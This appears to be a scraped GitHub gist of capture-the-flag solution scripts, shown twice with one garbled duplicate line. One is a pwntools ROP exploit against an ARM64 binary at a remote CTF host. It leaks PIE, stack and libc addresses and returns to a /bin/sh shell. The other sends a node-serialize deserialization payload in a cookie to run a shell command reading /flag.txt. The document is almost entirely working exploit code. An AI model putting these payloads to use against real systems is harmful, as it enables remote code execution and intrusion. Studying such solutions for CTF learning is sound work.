po6ix/BabyArmROP.py

## README.md

      
    Raw
  

              README.md
            
          
web

sparta


pwn

BabyArmROP


## BabyArmROP.py
from pwn import *

context.log_level = 'debug'

# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
p = remote('pwn.zh3r0.cf', 1111)
e = ELF('./vuln')

p.send('a'*8)
p.recvuntil('a'*8)

pie_leak = u32(p.recv(4))
pie_base = pie_leak - 0x8a8

info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))

payload = b'a'*0x28

payload += p64(pie_base + 0x87c) # w30 : sp += 0x30
payload += b'b'*0x8 # w29

payload += p64(pie_base + 0x82c) # vuln
payload += b'A'*0x8*4

payload += p64(0) # w29 = NULL
payload += p64(pie_base + 0x8b0) # w30 = sp += 10, ret

p.sendafter(':', payload)

p.send('k'*0x8)
p.recvuntil('k'*0x8)

stack_leak = u64(p.recv(6) + b'\0\0')

info('stack_leak: ' + hex(stack_leak))

payload = b'a'*0x28

payload += p64(pie_base + 0x920)
payload += p64(0) # w29

# 0x0000000000000900: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
payload += p64(pie_base + 0x900) # w30 (ret)
payload += p64(0) # x19 -> 0
payload += p64(0) # x20 -> 0

# payload += p64(stack_leak - 0x98) # x21 (ret2)
payload += p64(stack_leak - 0x98)
payload += p64(pie_base + 0x958) # x22 (arg0)
payload += p64(pie_base + 0x11030) # x23 (arg1)
payload += p64(pie_base + 0x7e7) # x24 (arg2)

payload += p64(pie_base + 0x850) # call printf in vuln
payload += p64(pie_base + 0x8b0) # sp += 10, ret

p.sendafter(':', payload)
p.recvuntil('Hello, ')

libc_leak = u32(p.recv(4))
libc_base = libc_leak - 0x4db38

info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))

payload = b'a'*0x28

# 0x0000000000106f14: ldr x0, [sp, #0x28]; ldp x29, x30, [sp], #0x30; ret;
payload += p64(libc_base + 0x106f14)
payload += p64(libc_base + 0x3f218) * 5
payload += p64(libc_base + 0x1265d0) # binsh

p.sendafter(':', payload)

p.interactive()

## sparta.py
import requests
import base64

res = requests.post('http://web.zh3r0.cf:6666/guest', headers = {
    'Cookie': b'guest=' + base64.b64encode(b'''
{"username":{"toString":"_$$ND_FUNC$$_(()=>{throw require('child_process').execSync('cat /flag.txt')})()"}}
'''.strip())
})

print(res.text)
	from pwn import *

	context.log_level = 'debug'

	# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
	p = remote('pwn.zh3r0.cf', 1111)
	e = ELF('./vuln')

	p.send('a'*8)
	p.recvuntil('a'*8)

	pie_leak = u32(p.recv(4))
	pie_base = pie_leak - 0x8a8

	info('pie_leak: ' + hex(pie_leak))
	info('pie_base: ' + hex(pie_base))

	payload = b'a'*0x28

	payload += p64(pie_base + 0x87c) # w30 : sp += 0x30
	payload += b'b'*0x8 # w29

	payload += p64(pie_base + 0x82c) # vuln
	payload += b'A'0x84

	payload += p64(0) # w29 = NULL
	payload += p64(pie_base + 0x8b0) # w30 = sp += 10, ret

	p.sendafter(':', payload)

	p.send('k'*0x8)
	p.recvuntil('k'*0x8)

	stack_leak = u64(p.recv(6) + b'\0\0')

	info('stack_leak: ' + hex(stack_leak))

	payload = b'a'*0x28

	payload += p64(pie_base + 0x920)
	payload += p64(0) # w29

	# 0x0000000000000900: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
	payload += p64(pie_base + 0x900) # w30 (ret)
	payload += p64(0) # x19 -> 0
	payload += p64(0) # x20 -> 0

	# payload += p64(stack_leak - 0x98) # x21 (ret2)
	payload += p64(stack_leak - 0x98)
	payload += p64(pie_base + 0x958) # x22 (arg0)
	payload += p64(pie_base + 0x11030) # x23 (arg1)
	payload += p64(pie_base + 0x7e7) # x24 (arg2)

	payload += p64(pie_base + 0x850) # call printf in vuln
	payload += p64(pie_base + 0x8b0) # sp += 10, ret

	p.sendafter(':', payload)
	p.recvuntil('Hello, ')

	libc_leak = u32(p.recv(4))
	libc_base = libc_leak - 0x4db38

	info('libc_leak: ' + hex(libc_leak))
	info('libc_base: ' + hex(libc_base))

	payload = b'a'*0x28

	# 0x0000000000106f14: ldr x0, [sp, #0x28]; ldp x29, x30, [sp], #0x30; ret;
	payload += p64(libc_base + 0x106f14)
	payload += p64(libc_base + 0x3f218) * 5
	payload += p64(libc_base + 0x1265d0) # binsh

	p.sendafter(':', payload)

	p.interactive()
	import requests
	import base64

	res = requests.post('http://web.zh3r0.cf:6666/guest', headers = {
	'Cookie': b'guest=' + base64.b64encode(b'''
	{"username":{"toString":"_$$ND_FUNC$$_(()=>{throw require('child_process').execSync('cat /flag.txt')})()"}}
	'''.strip())
	})

	print(res.text)